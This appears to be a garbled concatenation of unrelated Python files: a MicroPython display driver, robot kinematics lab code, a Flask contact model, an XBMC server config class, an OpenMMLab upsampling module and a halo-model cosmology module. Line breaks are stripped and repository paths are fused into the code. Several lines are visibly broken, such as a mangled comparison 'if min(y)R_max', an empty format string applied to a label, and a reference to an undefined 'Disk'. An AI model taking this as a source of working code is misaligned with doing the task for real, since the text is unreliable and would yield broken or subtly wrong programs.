1, height, color) def move(self, x=None, y=None): if x: self.x = x if y: self.y = y return self def fg(self, color=None): if color: self._fg = color return self else: return self._fg def bg(self, color=None): if color: self._bg = color return self else: return self._bg def text(self, text, x=None, y=None, color=None, background=None): if background is None: background = self._bg if color is None: color = self._fg if x is None: x = self.x if y is None: y = self.y x = min(self.width - 1, max(0, x)) y = min(self.height - 1, max(0, y)) lines = text.splitlines() longest = 0 for line in lines: longest = max(longest, len(line)) h = min(self.height - y, 8) buffer = bytearray(longest * 8 * 8 * 2) fb = framebuf.FrameBuffer(buffer, 8 * longest, 8, framebuf.RGB565) for line in lines: fb.fill(background) fb.text(line, 0, 0, color) self.blit_buffer(buffer, x, y, len(line) * 8, h) y += 8 if y >= self.height: break def blit_buffer(self, buffer, x, y, width, height): """Copy pixels from a buffer.""" if (not 0 <= x < self.width or not 0 <= y < self.height or not 0 < x + width <= self.width or not 0 < y + height <= self.height): raise ValueError("out of bounds") view = memoryview(buffer) onerow = 2 * width for row in range(height): offset = row * onerow self._block(x, y + row, x + width - 1, 1, view[offset:offset + onerow]) class DisplaySPI(Display): def __init__(self, spi, dc, cs=None, rst=None, width=1, height=1): self.spi = spi self.cs = cs self.dc = dc self.rst = rst if self.rst is None: self.rst = DummyPin() if self.cs is None: self.cs = DummyPin() self.cs.init(self.cs.OUT, value=1) self.dc.init(self.dc.OUT, value=0) self.rst.init(self.rst.OUT, value=1) self.reset() super().__init__(width, height) def reset(self): self.rst(0) utime.sleep_ms(50) self.rst(1) utime.sleep_ms(50) def _write(self, command=None, data=None): if command is not None: self.dc(0) self.cs(0) self.spi.write(bytearray([command])) self.cs(1) if data is not None: self.dc(1) self.cs(0) 
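# Data phase: DC is driven high to mark data bytes (as opposed to commands) and CS stays low for the SPI transfer, mirroring the command phase above.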
self.spi.write(data) self.cs(1) def _read(self, command=None, count=0): self.dc(0) self.cs(0) if command is not None: self.spi.write(bytearray([command])) if count: data = self.spi.read(count) self.cs(1) return data laboratory/Lab6/robot_kinematics.py1-10 import numpy as np def translate(vector): """ returns an homogenous transform for a 2D translate of vector """ transform = np.eye(4) transform[0:3,3] = vector return transform def vec_to_skew(p): """ transforms a 3D vector into a skew symmetric matrix """ return np.array([[0.,-p[2],p[1]],[p[2],0.,-p[0]],[-p[1],p[0],0]]) def twist_to_skew(twist): """ transforms a twist into its bracket representation """ br = np.zeros([4,4]) br[0:3,0:3] = vec_to_skew(twist[0:3]) br[0:3,3] = twist[3:6] return br def getAdjoint(T): """ returns the adjoint of a homogeneous transform """ ad = np.zeros([6,6]) ad[0:3,0:3] = T[0:3,0:3] ad[3:6,3:6] = T[0:3,0:3] ad[3:6,0:3] = vec_to_skew(T[0:3,3]).dot(T[0:3,0:3]) return ad def getExpPureRotationTwist(twist, theta): """ computes the exponential of a pure rotation unit twist applied for theta seconds we specialize the function to speed up computations for the real robot control loop since we know we won't need the v part, we can ignore this part """ T = np.eye(4) br = vec_to_skew(twist[0:3]) T[0:3,0:3] = np.eye(3) + np.sin(theta) * br + (1-np.cos(theta))*br.dot(br) return T def inverseT(T): """ computes the inverse of a homogeneous transform """ T_inv = np.eye(4) T_inv[0:3,0:3] = T[0:3,0:3].T T_inv[0:3,3] = -T[0:3,0:3].T.dot(T[0:3,3]) return T_inv class robot_kinematics: """ This class contains the necessary variables to compute the kinematics and Jacobians of the robot update_kinematics computes all the necessary quantities and homogeneous transforms and store them in instance variables that can be used afterwards """ def __init__(self): # here we define the variables for the robot lengths self.l0 = 0.3 self.l1 = 0.16 self.l2 = 0.16 self.l3 = 0.014 self.rot_axis1 = np.array([1.,0,0,0,0,0]) self.rot_axis2 = np.array([0.,0,1,0,0,0]) self.rot_axis3 = np.array([0.,0,1,0,0,0]) self.q = np.array([0,0,0]) self.spatialJ = np.zeros([6,3]) self.bodyJ = np.zeros([6,3]) self.orientedJ = np.zeros([6,3]) self.update_kinematics(self.q) def update_kinematics(self, q): """ Receives as input the state of the robot (vector of 3 angles) and computes all the homogeneous transforms and the Jacobians """ # first we compute the homogeneous transforms for the relative frames using theta0 to theta2 self.TS_H1 = translate(np.array([self.l0,0,0])).dot(getExpPureRotationTwist(self.rot_axis1,q[0])) self.TH1_H2 = translate(np.array([0,0,self.l3])).dot(getExpPureRotationTwist(self.rot_axis2,q[1])) self.TH2_K = translate(np.array([0,-self.l1,0])).dot(getExpPureRotationTwist(self.rot_axis3,q[2])) self.TK_F = translate(np.array([0,-self.l2,0])) # now we compute the pose of all the frames with respect to S self.TS_H2 = self.TS_H1.dot(self.TH1_H2) self.TS_K = self.TS_H2.dot(self.TH2_K) self.TS_F = self.TS_K.dot(self.TK_F) # we compute the spatial Jacobian self.spatialJ[:,0] = getAdjoint(self.TS_H1).dot(self.rot_axis1) self.spatialJ[:,1] = getAdjoint(self.TS_H2).dot(self.rot_axis2) self.spatialJ[:,2] = getAdjoint(self.TS_K).dot(self.rot_axis3) # the body Jacobian self.bodyJ = getAdjoint(inverseT(self.TS_F)).dot(self.spatialJ) # and the Jacobian with respect to O (the one we will use) TO_S = np.eye(4) TO_S[0:3,3] = -self.TS_F[0:3,3] self.orientedJ = getAdjoint(TO_S).dot(self.spatialJ) def analytic_inverse_kinematics2D(x,y): """ inverse kinematics 
function input (x,y) position of the foot output a list of 2D vectors which are possible solutions to the problem (the list is empty if there are no solutions) """ l0 = 0.3 l1 = 0.16 l2 = 0.16 l_des = np.sqrt((x-l0)**2 + y**2) ###First we check that the target is feasible otherwise we return empty if l_des > l1 + l2: # this is impossible, there are no solutions we return an empty list return [] # we compute the two possible solutions for theta2 # note that if l_des == l1 + l2 then theta2_p = theta2_m = 0 # so we will return twice the same solution (not ideal but simpler) theta2_p = np.arccos((l_des**2 - l1**2 - l2**2)/(2*l1*l2)) theta2_m = - theta2_p # we now compute alpha and beta as defined above alpha = np.arccos((-l2**2 + l1**2 + l_des**2)/(2*l1*l_des)) beta = np.arctan2(y,x-l0) # we compute alpha1 (the 2 possibilities) theta1_p = np.pi/2 - alpha + beta theta1_m = (alpha + beta + np.pi/2) # we return a list that contains the 2 solutions return [np.array([theta1_p, theta2_p]), np.array([theta1_m, theta2_m])] def compute_trajectory(th_init, th_goal, movement_duration, t): # first we compute the coefficients (as notes above) a5 = 6/(movement_duration**5) a4 = -15/(movement_duration**4) a3 = 10/(movement_duration**3) # now we compute s and ds/dt s = a3 * t**3 + a4 * t**4 + a5 * t**5 ds = 3 * a3 * t**2 + 4 * a4 * t**3 + 5 * a5 * t**4 #now we compute th and dth/dt (the angle and its velocity) th = th_init + s * (th_goal - th_init) dth = (th_goal - th_init) * ds # we return the answer return th, dthkassisdion/Simple_linux_scriptphonebook_server/server/phonebook_server/models.py from flask_sqlalchemy import SQLAlchemy from phonebook_server import app db = SQLAlchemy(app) class Contact(db.Model): id = db.Column(db.Integer,primary_key=True) firstname = db.Column(db.String) lastname = db.Column(db.String) address = db.Column(db.String) phone_number = db.Column(db.String) def __init__(self, firstname, lastname, address, phone_number): self.firstname = firstname self.lastname = lastname self.address = address self.phone_number = phone_number @property def serialize(self): """Return object data in easily serializeable format""" return { 'id' : self.id, 'firstname' : self.firstname, 'lastname' : self.lastname, 'address' : self.address, 'phone_number' : self.phone_number }# -*- coding: utf-8 -*- """ Set the version information for the package """ __author__ = '' __copyright__ = "Copyright (C) 2021 " VERSION = '1.0.3.1' # -*- coding: utf-8 -*- from ironworks import serverTools def highest_position(model): highest_position = 0 items = model.query.all() for item in items: if item.position > highest_position: highest_position = item.position return highest_position + 1 class XbmcServer(): def __init__(self): """Table for the XBMC server config""" self.configDb = serverTools.getPrefsDb() self.configDb.beginTransaction() self.configDb.checkTable("xbmc_servers", [ {"name": "id", "type": "integer primary key autoincrement"}, {"name": "label", "type": "text"}, {"name": "position", "type": "integer"}, {"name": "hostname", "type": "text"}, {"name": "port", "type": "text"}, {"name": "username", "type": "text"}, {"name": "password", "type": "text"}, {"name": "mac_address", "type": "text"}]) self.configDb.commitTransaction() self.label = None self.position = None self.hostname = None self.port = None self.username = None self.password = self.mac_address = None def __repr__(self): return '' % (self.label) def getNumXbmcServers(self): serverList = self.configDb.select("xbmc_servers") servers = serverList.fetchall() 
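# The length of the fetched row list is the number of configured XBMC servers.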
servers = len(servers) return servers def xbmcServer(self, label, position, hostname, port='8080', username=None, password=None, mac_address=None): self.label = label if position is None: self.position = highest_position(Disk) else: self.position = position self.hostname = hostname self.port = port self.username = username self.password = password self.mac_address = mac_address # Copyright (c) OpenMMLab. All rights reserved. import torch.nn.functional as F from mmcv.cnn import ConvModule from mmcv.runner import BaseModule, ModuleList class ConvUpsample(BaseModule): """ConvUpsample performs 2x upsampling after Conv. There are several `ConvModule` layers. In the first few layers, upsampling will be applied after each layer of convolution. The number of upsampling must be no more than the number of ConvModule layers. Args: in_channels (int): Number of channels in the input feature map. inner_channels (int): Number of channels produced by the convolution. num_layers (int): Number of convolution layers. num_upsample (int | optional): Number of upsampling layer. Must be no more than num_layers. Upsampling will be applied after the first ``num_upsample`` layers of convolution. Default: ``num_layers``. conv_cfg (dict): Config dict for convolution layer. Default: None, which means using conv2d. norm_cfg (dict): Config dict for normalization layer. Default: None. init_cfg (dict): Config dict for initialization. Default: None. kwargs (key word augments): Other augments used in ConvModule. """ def __init__(self, in_channels, inner_channels, num_layers=1, num_upsample=None, conv_cfg=None, norm_cfg=None, init_cfg=None, **kwargs): super(ConvUpsample, self).__init__(init_cfg) if num_upsample is None: num_upsample = num_layers assert num_upsample <= num_layers, \ f'num_upsample({num_upsample})must be no more than ' \ f'num_layers({num_layers})' self.num_layers = num_layers self.num_upsample = num_upsample self.conv = ModuleList() for i in range(num_layers): self.conv.append( ConvModule( in_channels, inner_channels, 3, padding=1, stride=1, conv_cfg=conv_cfg, norm_cfg=norm_cfg, **kwargs)) in_channels = inner_channels def forward(self, x): num_upsample = self.num_upsample for i in range(self.num_layers): x = self.conv[i](x) if num_upsample > 0: num_upsample -= 1 x = F.interpolate( x, scale_factor=2, mode='bilinear', align_corners=False) return x """ Halo Model - Everything in Physical frame, except for p(k) and xi(R) - pk, k, xi, R all comoving - To-do: write a vectorized Simpson integration routine - at >30 Mpc not accurate """ # TO-DO: # 2-halo term for Sigma # Need to tabulate everything in the end import sys import numpy as np from scipy import fftpack from scipy import integrate from scipy import interpolate from scipy.special import hyp2f1, spence import cosmology as cosmo import powerspectra as ps circular_virial = lambda Mhalo, z, CosPar: np.sqrt(cosmo.GG_MSun*Mhalo/virial_radius(Mhalo, 0.52, CosPar)) delta_sc = lambda z, CosPar: 3./20.*pow(12.*np.pi, 2./3.)*(1.+0.013*np.log10(cosmo.Omega_M_z(z, CosPar))) concentration = lambda Mhalo, z, Mhalo_star: 9./(1.+z)*(Mhalo/Mhalo_star)**(-0.13) # There are other models Hu & Kravtsov sigma_M_sqr = lambda Mhalo, z, CosPar: ps.sigma_R_sqr(pow(3.*Mhalo/4./np.pi/cosmo.rho_critical(z, CosPar)/cosmo.Omega_M_z(z,CosPar), 1./3.)*(1.+z), z, CosPar) # Physical to Comoving radius sigma_j_M_sqr = lambda j, Mhalo, z, CosPar: ps.sigma_j_R_sqr(j, pow(3.*Mhalo/4./np.pi/cosmo.rho_critical(z, CosPar)/cosmo.Omega_M_z(z,CosPar), 1./3.)*(1.+z), z, CosPar) # Physical to Comoving 
radius sigma_j_r_M1_M2_sqr = lambda j, r, Mhalo1, Mhalo2, z, CosPar: sigma_j_r_R1_R2_sqr(j, r, pow(3.*Mhalo1/4./np.pi/cosmo.rho_critical(z, CosPar)/cosmo.Omega_M_z(z,CosPar), 1./3.)*(1.+z), pow(3.*Mhalo2/4./np.pi/cosmo.rho_critical(z, CosPar)/cosmo.Omega_M_z(z,CosPar), 1./3.)*(1.+z), z, CosPar) # Physical to Comoving radius nu_f_nu = lambda nu: 0.129*np.sqrt(nu/np.sqrt(2.))*(1.+pow(nu/np.sqrt(2.), -0.3))*np.exp(-nu/np.sqrt(2.)/2.) # Sheth & Tormen 1999 nu=[delta_sc/D_growth/sigma_M]^2. 0.129 is for the whole integral, need to calculate the normalization again bias_nu = lambda nu, d_sc: 1.+nu/np.sqrt(2.)/d_sc+0.35*pow(nu/np.sqrt(2.), 1.-0.8)/d_sc-pow(nu/np.sqrt(2.), 0.8)/(pow(nu/np.sqrt(2.), 0.8)+0.35*(1.-0.8)*(1.-0.8/2.))/d_sc*np.sqrt(np.sqrt(2.)) # Tinker+2005 bias_nu_st = lambda nu, d_sc: 1.+(0.73*nu-1.)/d_sc+2.*0.15/d_sc/(1.+pow(0.73*nu, 0.15)) # Sheth & Tormen 1999 f_sigma = lambda sigma_M: 0.186*(1.+pow(sigma_M/2.57, -1.47))*np.exp(-1.19/sigma_M**2) # Tinker+2008, Delta=200 f_Legendre = lambda z, CosPar: cosmo.Omega_M_z(z, CosPar)**0.55 #Mhalo_star: This has to be tabulated for different cosmology parameters. Calculate it on the fly takes too much time. (Compute_Mhalo_star(Cosmo)) M_star = 5.19E12 # MSun not h^-1 MSun # Even though it's vectorized, it requires a large amount of memory to have a 3-D array (1E4, 1E4, 1E4) def NFW_ukm_integrand(logR, k, Mhalo, z, CosPar): """ NFW_ukm_integrand(logR, kk, Mhalo, z, CosPar) """ R_vir = virial_radius(Mhalo, z, CosPar) RR = R_vir*(np.exp(logR)).reshape(logR.shape[0], logR.size/logR.shape[0]) rhoR = NFW_profile(RR, Mhalo, z, CosPar) # rhoR(RR,Mhalo) RR_tmp = np.ones(Mhalo.size)*RR kR = RR_tmp*k.reshape(k.size, 1, 1) # kR(k, RR, Mhalo) WRK = np.sin(kR)/kR # (k, RR, Mhalo) return 1E18*4.*np.pi*RR_tmp**3*WRK*rhoR def NFW_ukm(k, Mhalo, z, CosPar): """ NFW_ukm(k, Mhalo, z, CosPar): output ukm[k, Mhalo] """ k = np.array(k) Mhalo = np.array(Mhalo) R_min = 1E-4 # in R_vir in the integrand R_max = 1. 
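# Integrate over a log-spaced grid of radii from 1e-4 to 1 R_vir; the weighted sum returned below is a Simpson-style rule in log R (cf. the module's note about a vectorized Simpson routine).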
dlogR = 1E-3 logR = np.arange(np.log(R_min)-2.*dlogR, np.log(R_max)+2.*dlogR, dlogR) nlogR = logR.size Integrand = NFW_ukm_integrand(logR, k, Mhalo, z, CosPar) # (k, RR, Mhalo) return np.sum((Integrand[:,2:,:]+Integrand[:,:nlogR-2,:]+4.*Integrand[:,1:nlogR-1,:])/6.*dlogR, axis=1)/Mhalo def ps_2h_gal_dm_integrand(logM, k, z, CosPar): """ ps_2h_gal_dm_integrand(logM, k, z, CosPar): """ MM = np.exp(logM) dn_dlogM = halo_mass_function(MM, z, CosPar) bM = bias(MM, z, CosPar) # This is because I don't have 1 TB RAM ukm = np.zeros((k.size, logM.size)) progressbar_width = 80 progressbar_interval = logM.size/progressbar_width+1 # setup progress bar sys.stdout.write("[%s]" % (" " * progressbar_width)) sys.stdout.flush() sys.stdout.write("\b" * (progressbar_width+1)) # return to start of line, after '[' # Note ukm is physical, but k is comoving for i in np.arange(logM.size): ukm[:,i] = (NFW_ukm(k*(1.+z), MM[i], z, CosPar)).reshape(k.size) if (i%progressbar_interval==0): sys.stdout.write("-") sys.stdout.flush() sys.stdout.write("\n") return dn_dlogM*bM*ukm*MM/cosmo.rho_critical(z, CosPar)/cosmo.Omega_M_z(z, CosPar) # No bias included def ps_2h_gal_dm(k, Mhalo, z, CosPar, doHalo=False): """ ps_2h_gal_dm(k, Mhalo, z, CosPar): return pk(k, Mhalo) """ k = np.array(k) bias_normalization = 1.08037 # The mean bias between 1E3 and 1E17 solar mass #bM = bias(Mhalo, z, CosPar) #print bM plk = ps.ps_linear(k, z, CosPar) if doHalo: # This needs to be changed for spatial exclusion and normalization -- so we keep Mhalo in the arguments M_min = 1E3 M_max = 1E17 dlogM = 1E-2 logM = np.arange(np.log(M_min)-2.*dlogM, np.log(M_max)+2.*dlogM, dlogM) nlogM = logM.size Integrand = ps_2h_gal_dm_integrand(logM, k, z, CosPar) return (plk*np.sum((Integrand[:,2:]+Integrand[:,:nlogM-2]+4.*Integrand[:,1:nlogM-1])/6.*dlogM, axis=1)).reshape(k.size, 1)/bias_normalization else: return plk.reshape(k.size, 1) def xi_from_pk_fbt(R, Pk_func, UseTable=False): """ xi_from_pk_fbt(R, Pk_func): Inverse Fourier Bessel Transform """ k_min = 1E-6 k_max = 1E4 dlogk = 1.E-2 kk = np.exp(np.arange(np.log(k_min)-2.*dlogk,np.log(k_max)+2.*dlogk,dlogk)) nlogk = kk.size pk = Pk_func(kk) # pk(kk, Mhalo) kR = kk.reshape(kk.size, 1, 1)*R.reshape(1, R.shape[0], R.shape[0]/R.size) # kR(k, RR, Mhalo) WRK = np.sin(kR)/kR Ifbt = kk.reshape(kk.size, 1, 1)**3/2./np.pi**2*pk.reshape(pk.shape[0], 1, pk.shape[1])*WRK return np.sum((Ifbt[2:,:,:]+Ifbt[:nlogk-2,:,:]+4.*Ifbt[1:nlogk-1,:,:])/6.*dlogk, axis=0) # No bias included: xiR = b(Mhalo)*xi_2h_gal_dm # R can be in shape of (R, Mhalo) or (R) def xi_2h_gal_dm(R, Mhalo, z, CosPar, doHalo=False): """ xi_2h_gal_dm(R, Mhalo, z, CosPar): """ Mhalo = np.array(Mhalo) Mhalo = Mhalo.reshape(Mhalo.size) R = np.ones(Mhalo.size)*R.reshape(R.shape[0], R.size/R.shape[0]) xiR = np.zeros((R.size, Mhalo.size)) # This is because I don't have 1TB memory for i in np.arange(Mhalo.size): Pk_func = lambda k: ps_2h_gal_dm(k, Mhalo[i], z, CosPar, doHalo=doHalo) xiR[:,i] = (xi_from_pk_fbt(R[:,i], Pk_func)).reshape(R.shape[0]) # bM = bias(Mhalo, z, CosPar) return xiR # Mhalo_star in when Sigma = delta_sc def Mhalo_star(z, CosPar): M_min = 1E8 M_max = 1E17 dlogM = 1E-2 logM = np.arange(np.log(M_min), np.log(M_max)+2.*dlogM, dlogM) MM = np.exp(logM) sigma_M = np.sqrt(sigma_M_sqr(MM, 0, CosPar)) # at z=0 dsc = delta_sc(z, CosPar) f = interpolate.interp1d(sigma_M[::-1], MM[::-1]) return f(dsc) # b(M) def bias(Mhalo0, z, CosPar): Mhalo = np.array(Mhalo0) print "IF YOU SEE ME TOO MANY TIMES, YOU SHOULD VECTORIZE YOUR CODE. 
MAYBE YOU SHOULD VECTORIZE ME!" M_min = 1E3 M_max = 1E17 #if min(Mhalo)M_max: raise ValueError("halo mass too large") dlogM = 1E-2 logM = np.arange(np.log(M_min)-2.*dlogM, np.log(M_max)+2.*dlogM, dlogM) MM = np.exp(logM) sigma_M2 = sigma_M_sqr(MM, 0, CosPar) # at z=0 dsc = delta_sc(z, CosPar) nuM = dsc**2/sigma_M2/(cosmo.D_growth(z,CosPar)/cosmo.D_growth(0,CosPar))**2 bM = bias_nu(nuM, dsc) f = interpolate.interp1d(MM, bM) return f(Mhalo) # dN/dlogM def halo_mass_function(Mhalo, z, CosPar): print "IF YOU SEE ME TOO MANY TIMES, YOU SHOULD VECTORIZE YOUR CODE. MAYBE YOU SHOULD VECTORIZE ME!" M_min = 1E3 M_max = 1E17 dlogM = 1E-2 logM = np.arange(np.log(M_min)-2.*dlogM, np.log(M_max)+2.*dlogM, dlogM) nlogM = logM.size MM = np.exp(logM) sigma_M2 = sigma_M_sqr(MM, 0, CosPar) # at z=0 dsc = delta_sc(z, CosPar) nuM = dsc**2/sigma_M2/(cosmo.D_growth(z,CosPar)/cosmo.D_growth(0,CosPar))**2 #print min(nuM), max(nuM) dlognuM = np.zeros(nlogM) dlognuM[1:] = np.log(nuM[1:]/nuM[:nlogM-1]) dlognuM[0] = dlognuM[1] fM = nu_f_nu(nuM) nmz = fM*cosmo.rho_critical(z, CosPar)*cosmo.Omega_M_z(z, CosPar)/MM*dlognuM/dlogM Inte = fM*dlognuM normalization = np.sum(Inte[2:]+Inte[:nlogM-2]+4.*Inte[1:nlogM-1])/6. #print normalization f = interpolate.interp1d(MM, nmz) return f(Mhalo)/normalization def Delta_virial(z, CosPar): """ Delta_virial(z, CosPar): Bryan & Norman 1998. See also Weinberg & Kamionkowski 2003 """ #x = cosmo.Omega_M_z(z, CosPar)*(1.+z)**3/(cosmo.Omega_M_z(z,CosPar)*(1.+z)**3+cosmo.Omega_L_z(z,CosPar)) x = cosmo.Omega_M_z(z, CosPar)-1. return (18*np.pi*np.pi+82.*x-39.*x*x)/(1.+x) # Is this comoving or physical?: Physical def virial_radius(Mhalo, z, CosPar): """ virial_radius(Mhalo, z, CosPar): physical virial radius, multiply it by 1.+z to get comoving radius """ factor = 3./4./np.pi/cosmo.rho_critical(z, CosPar)/cosmo.Omega_M_z(z,CosPar)/Delta_virial(z, CosPar) return (factor*Mhalo)**(1./3.) # Bullock 2001 approximation virial_radius_jb01 = lambda Mhalo, z, CosPar: pow(Mhalo/1E11*CosPar['h']*200./CosPar['Omega_M']/Delta_virial(z, CosPar), 1./3.)*75./(1.+z)/CosPar['h'] def rho_s(c, z, CosPar, alpha=1.): """ rho_s(c, z, CosPar, alpha=1.) """ if (alpha<3. and alpha>0.): if (alpha==1.): factor=(np.log(1.+c)-c/(1.+c)) else: factor = c**(3.-alpha)/(3.-alpha)*hyp2f1(3.-alpha, 3.-alpha, 4.-alpha, -c) else: raise ValueError("alpha has to be in the set (0,3)") return cosmo.rho_critical(z,CosPar)*cosmo.Omega_M_z(z, CosPar)*Delta_virial(z, CosPar)*c**3/3./factor # NFW profile, allowing concentration to be fcorr*c and the slope to be alpha # r in ascending order # rho(r, Mhalo) def NFW_profile(R, Mhalo, z, CosPar, fcorr=1., alpha=1.): """ NFW_profile(R, Mhalo, z, CosPar, fcorr=1., alpha=1.) return rho(R), R in Mpc, rho in MSun pc^-2 """ R = np.array(R) # r could be r(r) or r(r, Mhalo) R = R.reshape(R.shape[0], R.size/R.shape[0]) Mhalo = np.array(Mhalo) c = fcorr*concentration(Mhalo, z, M_star) R_vir = virial_radius(Mhalo, z, CosPar) rhos = rho_s(c,z,CosPar,alpha) x = c*R/R_vir # cr/rvir(R, Mhalo) rsqrrho = pow(x, -alpha)*pow(1.0+x, alpha-3.0) return rhos*rsqrrho/1E18 # 1E18 Mpc -> pc # y can be y(ny,1) or y(ny, nMhalo) def NFW_project_profile(y, Mhalo, z, CosPar, fcorr=1., alpha=1.): """ NFW_project_profile(y0, Mhalo, z, CosPar, fcorr=1., alpha=1.) 
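Projects the 3-D NFW profile along the line of sight (an Abel integral over R > y) using an interpolated log-R grid; returns Sigma_y with shape (ny, nMhalo).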
""" # Need to do some argumente/keyword checking R_min = 1E-5 R_max = 2E3 if min(y)R_max: raise ValueError("y too large") y = np.array(y) y = y.reshape(y.shape[0], y.size/y.shape[0]) # Convert it to y(ny,1) or y(ny,nMhalo) ny = y.shape[0] Mhalo = np.array(Mhalo) nMhalo = Mhalo.size yy = np.ones(nMhalo)*y.reshape(ny,1) # Set up interpolation profiles dlogR = 1E-2 R = np.exp(np.arange(np.log(R_min)-2.*dlogR, np.log(R_max)+2.*dlogR, dlogR)) nR = R.shape[0] R = np.ones(nMhalo)*R.reshape(nR, 1) # R(nR, nMhalo) rhoR = NFW_profile(R, Mhalo, z, CosPar, fcorr, alpha) # rhoR(nR, nMhalo) Rout = 6. Rvir = virial_radius(Mhalo, z, CosPar).reshape(nMhalo) # Rvir(nMhalo) Sigma_y = np.zeros((ny, nMhalo)) # Initialize output: Sigma_y(ny, nMhalo) # Very difficult to vectorize without approximation # Let's settle for what we have now dlogs = 1E-3 # 10% better than 1E-2 for i in np.arange(nMhalo): f = interpolate.interp1d(R[:,i], rhoR[:,i]) Sigma_integrand = lambda R, s: 2.*f(R)*R**2/np.sqrt(R*R-s*s) # dlogR s_max = max(Rvir[i]*Rout, max(yy[:,i])*1.2) s_min = yy[:,i] for j in np.arange(ny): ss = np.exp(np.arange(np.log(s_min[j])+dlogs,np.log(s_max)+dlogs,dlogs)) nlogs = ss.size Integrand = Sigma_integrand(ss, s_min[j]) Sigma_y[j, i] = np.sum((Integrand[2:]+Integrand[:nlogs-2]+4.*Integrand[1:nlogs-1])/6.*dlogs)*1E6 return Sigma_y # This piece of code is not finished yet def NFW_average_project_density(y0, Mhalo, z, CosPar, fcorr=1., alpha=1.): """ NFW_average_project_density(y0, Mhalo, z, CosPar, fcorr=1., alpha=1.) """ y = np.array(y0) c = fcorr*concentration(Mhalo, z, M_star) rvir = virial_radius(Mhalo, z, CosPar) ymin = rvir/c*1E-4 ymax = max(y) dlogy = 1E-2 ytmp = np.arange(np.log(ymin)-2.*dlogy, np.log(ymax)+2.*dlogy, dlogy) ytmp = np.exp(ytmp) if (ytmp.size <= 1): raise ValueError("The radius array is unrealistic.") #print "Integration Steps: ", ytmp.size #print "Computing projected density:" projected_density = NFW_project_profile_novector(ytmp, Mhalo, z, CosPar, fcorr, alpha) #print "Done computing projected density Done" #print "Computing average density:" total_mass = np.zeros(ytmp.size) total_mass[0] = projected_density[0]*np.pi*ymin*ymin #trapezoidal integration for i in np.arange(ytmp.size-1)+1: total_mass[i] = total_mass[i-1]+(projected_density[i]*ytmp[i]+projected_density[i-1]*ytmp[i-1])*(ytmp[i]-ytmp[i-1])*np.pi # average_density[i] = total_mass[i]/np.pi/ytmp[i]/ytmp[i] # Needs testing average_density = total_mass/np.pi/ytmp**2 #intepolation f = interpolate.interp1d(ytmp, average_density) return f(y) def NFW_profile_novector(R, Mhalo, z, CosPar, fcorr=1., alpha=1.): """ NFW_profile(R, Mhalo, z, CosPar, fcorr=1., alpha=1.) return rho(R), R in Mpc, rho in MSun pc^-2 """ c = fcorr*concentration(Mhalo, z, M_star) R_vir = virial_radius(Mhalo, z, CosPar) rhos = rho_s(c,z,CosPar,alpha) x = c*R/R_vir # cr/rvir(R, Mhalo) rsqrrho = pow(x, -alpha)*pow(1.0+x, alpha-3.0) return rhos*rsqrrho/1E18 # 1E18 Mpc -> pc # Projected NFW profile, Abel's tranform. *MUST* be vectorized! def NFW_project_integrand_novector(r, s, Mhalo, z, CosPar, fcorr=1., alpha=1.): return 2.*NFW_profile_novector(r, Mhalo, z, CosPar, fcorr, alpha)*r/np.sqrt(r*r-s*s)*1E6 # Can/Should use interpolation to speed up (see average_project_density below) *MUST* be vectorized! def NFW_project_profile_novector(y0, Mhalo, z, CosPar, fcorr=1., alpha=1.): """ NFW_project_profile_novector(y0, Mhalo, z, CosPar, fcorr=1., alpha=1.) """ rout = 5. 
y = np.array(y0) rvir = virial_radius(Mhalo, z, CosPar) ymax = max(max(y)*1.1, rvir*rout) # For each y, call NFW_profile once, can we just call NFW_profile once and be done with it? NFW_func = np.vectorize(lambda y, Mhalo, z, CosPar, fcorr, alpha: integrate.quad(NFW_project_integrand_novector, y*1.001, ymax, limit=1000, args=(y, Mhalo, z, CosPar, fcorr, alpha))) NFW_proj, err = NFW_func(y, Mhalo, z, CosPar, fcorr, alpha) return NFW_proj # Bottleneck, NFW_project_profile *MUST* be vectorized def NFW_average_project_density_novector(y0, Mhalo, z, CosPar, fcorr=1., alpha=1.): """ NFW_average_project_density_novector(y0, Mhalo, z, CosPar, fcorr=1., alpha=1.) """ y = np.array(y0) c = fcorr*concentration(Mhalo, z, M_star) rvir = virial_radius(Mhalo, z, CosPar) ymin = rvir/c*1E-4 ymax = max(y) dlogy = 1E-2 ytmp = np.arange(np.log(ymin)-2.*dlogy, np.log(ymax)+2.*dlogy, dlogy) ytmp = np.exp(ytmp) if (ytmp.size <= 1): raise ValueError("The radius array is unrealistic.") #print "Integration Steps: ", ytmp.size #print "Computing projected density:" projected_density = NFW_project_profile_novector(ytmp, Mhalo, z, CosPar, fcorr, alpha) #print "Done computing projected density Done" #print "Computing average density:" total_mass = np.zeros(ytmp.size) total_mass[0] = projected_density[0]*np.pi*ymin*ymin #trapezoidal integration for i in np.arange(ytmp.size-1)+1: total_mass[i] = total_mass[i-1]+(projected_density[i]*ytmp[i]+projected_density[i-1]*ytmp[i-1])*(ytmp[i]-ytmp[i-1])*np.pi # average_density[i] = total_mass[i]/np.pi/ytmp[i]/ytmp[i] # Needs testing average_density = total_mass/np.pi/ytmp**2 #intepolation f = interpolate.interp1d(ytmp, average_density) return f(y) # One dimensional virial motion? def NFW_approx_sigma_virial(Mhalo, z, CosPar, fcorr=1., alpha=1.): fsigma = 0.9 corr = (cosmo.Hubble_z(z, CosPar)**2*Delta_virial(z,CosPar)) return 476.*fsigma*pow(Mhalo/1E15, 1/3.)*pow(corr, 1./6.) def NFW_approx_sigma_halo(Mhalo, z, CosPar, fcorr=1., alpha=1.): sigma_fit = 400. R_fit = 50. #R_scale = virial_radius(Mhalo, z, CosPar) R_scale = pow(3.*Mhalo/4./np.pi/cosmo.rho_critical(z, CosPar)/cosmo.Omega_M_z(z,CosPar), 1./3.)*(1.+z) #print R_scale eta = 0.85 return sigma_fit/(1.+pow(R_scale/R_fit, eta)) def NFW_sigma_halo(Mhalo, z, CosPar, fcorr=1., alpha=1.): return np.sqrt(sigma_j_M_sqr(-1, Mhalo, z, CosPar))*CosPar['h']*100*f_Legendre(0., CosPar)*np.sqrt(1.-sigma_j_M_sqr(0, Mhalo, z, CosPar)**2/sigma_j_M_sqr(1,Mhalo,z,CosPar)/sigma_j_M_sqr(-1,Mhalo,z,CosPar)) # velocity anisotropy: beta = 0.5 (radial velocity dispersion) def NFW_sigma(R, Mhalo, z, CosPar, fcorr=1., alpha=1.): """ NFW_sigma(R, Mhalo, z, CosPar, fcorr=1., alpha=1.) 
